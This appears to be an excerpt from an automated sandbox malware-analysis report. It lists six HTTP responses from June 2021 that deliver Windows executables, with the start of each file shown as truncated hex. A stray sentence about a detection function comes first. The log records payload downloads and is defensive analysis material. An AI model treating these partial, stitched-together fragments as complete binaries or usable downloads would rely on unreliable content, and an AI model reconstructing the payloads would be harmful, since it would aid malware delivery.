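On its own, none of these traits is conclusive (legitimate software also posts forms to PHP endpoints), so the function returns the list of hits rather than a verdict and leaves the scoring to the caller; the onion extractor relies on fixed address lengths precisely because the memory dump has no delimiters to anchor on.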
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 16:47:38 GMTETag: "ae600-5c571aa0f41c6"Accept-Ranges: bytesContent-Length: 714240Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 57 0c 8a d1 36 62 d9 d1 36 62 d9 d1 36 62 d9 cf 64 f7 d9 f0 36 62 d9 cf 64 e1 d9 50 36 62 d9 cf 64 e6 d9 e8 36 62 d9 f6 f0 19 d9 d4 36 62 d9 d1 36 63 d9 72 36 62 d9 cf 64 e8 d9 d0 36 62 d9 cf 64 f6 d9 d0 36 62 d9 cf 64 f3 d9 d0 36 62 d9 52 69 63 68 d1 36 62 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 02 f8 96 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 7a 08 00 00 16 4c 00 00 00 00 00 d0 13 00 00 00 10 00 00 00 90 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 54 00 00 04 00 00 c8 34 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 38 09 00 3c 00 00 00 00 30 53 00 88 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 54 00 4c 1d 00 00 b0 92 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 78 08 00 00 10 00 00 00 7a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 48 b6 00 00 00 90 08 00 00 b8 00 00 00 7e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 da 49 00 00 50 09 00 
00 20 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 21 01 00 00 30 53 00 00 22 01 00 00 56 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 6d 00 00 00 60 54 00 00 6e 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 13:10:22 GMTETag: "978a0-5c56ea104518e"Accept-Ranges: bytesContent-Length: 620704Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 91 04 d3 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9a 06 00 00 b0 02 00 00 00 00 00 7e b9 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 09 00 00 02 00 00 66 62 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c b9 06 00 4f 00 00 00 00 c0 06 00 58 ac 02 00 00 00 00 00 00 00 00 00 00 4c 09 00 a0 2c 00 00 00 80 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 99 06 00 00 20 00 00 00 9a 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 ac 02 00 00 c0 06 00 00 ae 02 00 00 9c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 09 00 00 02 00 00 00 4a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b9 06 00 00 00 00 00 48 00 00 00 02 00 05 00 70 02 06 00 bc b6 00 00 03 00 00 00 62 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 e8 00 36 99 20 94 ff f3 1e ac 6e 52 ef e1 af 0b 82 ef 88 e9 fe b9 c4 77 62 29 26 f6 ed 24 ad 3e c6 ef d6 ae c7 68 ee fd 6a 4e 17 6a 2b 7c cb e5 fa 82 f9 6b 32 5b e3 9a ce 97 4b f5 95 be d9 bc df 72 d5 74 b7 d6 b4 b7 c4 37 1c 4d f1 2f d6 e6 f3 45 89 89 71 76 a4 b4 31 21 1a 31 cb 8a 19 ae d3 fd 6f 85 ea 0e 52 4e b7 c4 75 76 b4 12 8e bc 5f 35 f0 3e ed 1a 28 06 5a 0a 75 fc 61 1b cf 40 39 db c0 b5 dc f0 06 1b bf f5 ff c2 93 f8 b2 45 e9 bf 69 f1 14 6d 6b b1 37 08 ff 61 ce 1a 09 7f bf 38 81 9a 63 9e 98 c5 f3 70 81 94 c8 b2 b7 99 2f 2b 37 47 6a bf f3 f0 8a 83 e0 e7 c3 fd 33 eb 98 8d 51 79 62 be 59 cc af 94 69 38 a5 b7 84 23 74 fb 0f 96 68 0d 17 96 f3 c5 fa 9c ef 7e 39 ab 1a 2a fb f6 02 4b 00 d7 62 61 59 a9 a3 9f e1 0f e1 0e 88 6a 2b 1c 57 48 69 45 2e 69 6a 57 1f 8e 28 3f 09 b0 79 23 47 15 eb 7f ae 79 d7 5b 55 19 c2 73 f3 3e 67 4c e2 49 29 b7 31 ad 10 b3 e1 4c c4 67 3e 57 d6 27 94 d7 5d ac 64 ec d3 ec 08 9a e3 4b fa 77 f2 bf 28 f9 48 3d fa 69 e3 94 37 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 23 Jun 2021 20:22:15 GMTContent-Type: application/x-msdos-programContent-Length: 357376Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Wed, 23 Jun 2021 20:22:01 GMTETag: "57400-5c574a8c55e52"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 49 ba 11 89 0d db 7f da 0d db 7f da 0d db 7f da 13 89 ea da 2c db 7f da 13 89 fc da 8c db 7f da 13 89 fb da 34 db 7f da 2a 1d 04 da 08 db 7f da 0d db 7e da ad db 7f da 13 89 f5 da 0c db 7f da 13 89 ed da 0c db 7f da 13 89 eb da 0c db 7f da 13 89 ee da 0c db 7f da 52 69 63 68 0d db 7f da 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff e4 32 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 24 03 00 00 fa 4b 00 00 00 00 00 d0 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 4f 00 00 04 00 00 55 c6 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 f4 03 00 4e 00 00 00 d4 e6 03 00 3c 00 00 00 00 e0 4d 00 30 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 4e 00 4c 1d 00 00 a0 42 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 dd 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 23 03 00 00 10 00 00 00 24 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae b4 00 00 00 40 03 00 00 b6 00 00 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 
40 2e 64 61 74 61 00 00 00 b8 da 49 00 00 00 04 00 00 20 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 0b 01 00 00 e0 4d 00 00 0c 01 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 69 00 00 00 f0 4e 00 00 6a 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:15 GMTServer: ATSLast-Modified: Wed, 23 Jun 2021 19:36:38 GMTAccept-Ranges: bytesContent-Length: 13098974Cache-Control: max-age=5Content-Type: application/x-msdownloadEtag: "c7dfde-5c57406785ffd"Expires: Wed, 23 Jun 2021 20:22:20 GMTAge: 0Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c5 85 97 56 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 19 00 8c 00 00 00 96 00 00 00 ae 01 00 5d 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 97 ff 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 98 12 00 00 00 10 04 00 70 bd 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 d8 69 00 00 00 b0 00 00 00 6a 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 98 12 00 00 00 d0 02 00 
00 14 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 20 01 00 00 f0 02 00 00 04 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 70 bd 01 00 00 10 04 00 00 be 01 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 16:37:16 GMTETag: "5ab70-5c57184f6db5b"Accept-Ranges: bytesContent-Length: 371568Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 75 46 84 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8c 05 00 00 08 00 00 00 00 00 00 f6 a9 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 94 73 06 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 a9 05 00 4f 00 00 00 00 c0 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 98 05 00 70 13 00 00 00 e0 05 00 0c 00 00 00 88 a9 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 89 05 00 00 20 00 00 00 8c 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 02 00 00 00 c0 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 04 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 18:43:40 GMTETag: "69e00-5c57349049fd0"Accept-Ranges: bytesContent-Length: 433664Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 57 0c 8a d1 36 62 d9 d1 36 62 d9 d1 36 62 d9 cf 64 f7 d9 f0 36 62 d9 cf 64 e1 d9 50 36 62 d9 cf 64 e6 d9 e8 36 62 d9 f6 f0 19 d9 d4 36 62 d9 d1 36 63 d9 72 36 62 d9 cf 64 e8 d9 d0 36 62 d9 cf 64 f6 d9 d0 36 62 d9 cf 64 f3 d9 d0 36 62 d9 52 69 63 68 d1 36 62 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 82 15 d1 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 4a 04 00 00 fe 4b 00 00 00 00 00 d0 13 00 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 50 00 00 04 00 00 59 11 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 08 05 00 3c 00 00 00 00 00 4f 00 30 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 50 00 4c 1d 00 00 b0 62 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 48 04 00 00 10 00 00 00 4a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 48 b6 00 00 00 60 04 00 00 b8 00 00 00 4e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 da 49 00 00 20 05 00 
00 20 00 00 00 06 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 0b 01 00 00 00 4f 00 00 0c 01 00 00 26 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6a 6a 00 00 00 10 50 00 00 6c 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jun 2021 20:22:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 23 Jun 2021 10:06:05 GMTETag: "101918-5c56c0dfd8fbc"Accept-Ranges: bytesContent-Length: 1055000Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e7 f8 d2 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3a 0d 00 00 b0 02 00 00 00 00 00 be 58 0d 00 00 20 00 00 00 60 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 10 00 00 02 00 00 1c 25 10 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 58 0d 00 4b 00 00 00 00 60 0d 00 78 ac 02 00 00 00 00 00 00 00 00 00 00 ec 0f 00 18 2d 00 00 00 20 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 38 0d 00 00 20 00 00 00 3a 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 78 ac 02 00 00 60 0d 00 00 ae 02 00 00 3c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 10 00 00 02 00 00 00 ea 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 58 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 08 74 0c 00 68 e4 00 00 03 00 00 00 90 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 e8 00 36 99 20 94 ff f3 1e ac 6e 52 ef e1 af 0b 82 ef 88 e9 fe b9 c4 77 62 29 26 f6 ed 24 ad 3e c6 ef d6 ae c7 68 ee fd 6a 4e 17 6a 2b 7c cb e5 fa 82 f9 6b 32 5b e3 9a ce 97 4b f5 95 be d9 bc df 72 d5 74 b7 d6 b4 b7 c4 37 1c 4d f1 2f d6 e6 f3 45 89 89 71 76 a4 b4 31 21 1a 31 cb 8a 19 ae d3 fd 6f 85 ea 0e 52 4e b7 c4 75 76 b4 12 8e bc 5f 35 f0 3e ed 1a 28 06 5a 0a 75 fc 61 1b cf 40 39 db c0 b5 dc f0 06 1b bf f5 ff c2 93 f8 b2 45 e9 bf 69 f1 14 6d 6b b1 37 08 ff 61 ce 1a 09 7f bf 38 81 9a 63 9e 98 c5 f3 70 81 94 c8 b2 b7 99 2f 2b 37 47 6a bf f3 f0 8a 83 e0 e7 c3 fd 33 eb 98 8d 51 79 62 be 59 cc af 94 69 38 a5 b7 84 23 74 fb 0f 96 68 0d 17 96 f3 c5 fa 9c ef 7e 39 ab 1a 2a fb f6 02 4b 00 d7 62 61 59 a9 a3 9f e1 0f e1 0e 88 6a 2b 1c 57 48 69 45 2e 69 6a 57 1f 8e 28 3f 09 b0 79 23 47 15 eb 7f ae 79 d7 5b 55 19 c2 73 f3 3e 67 4c e2 49 29 b7 31 ad 10 b3 e1 4c c4 67 3e 57 d6 27 94 d7 5d ac 64 ec d3 ec 08 9a e3 4b fa 77 f2 bf 28 f9 48 3d fa 69 e3 94 37
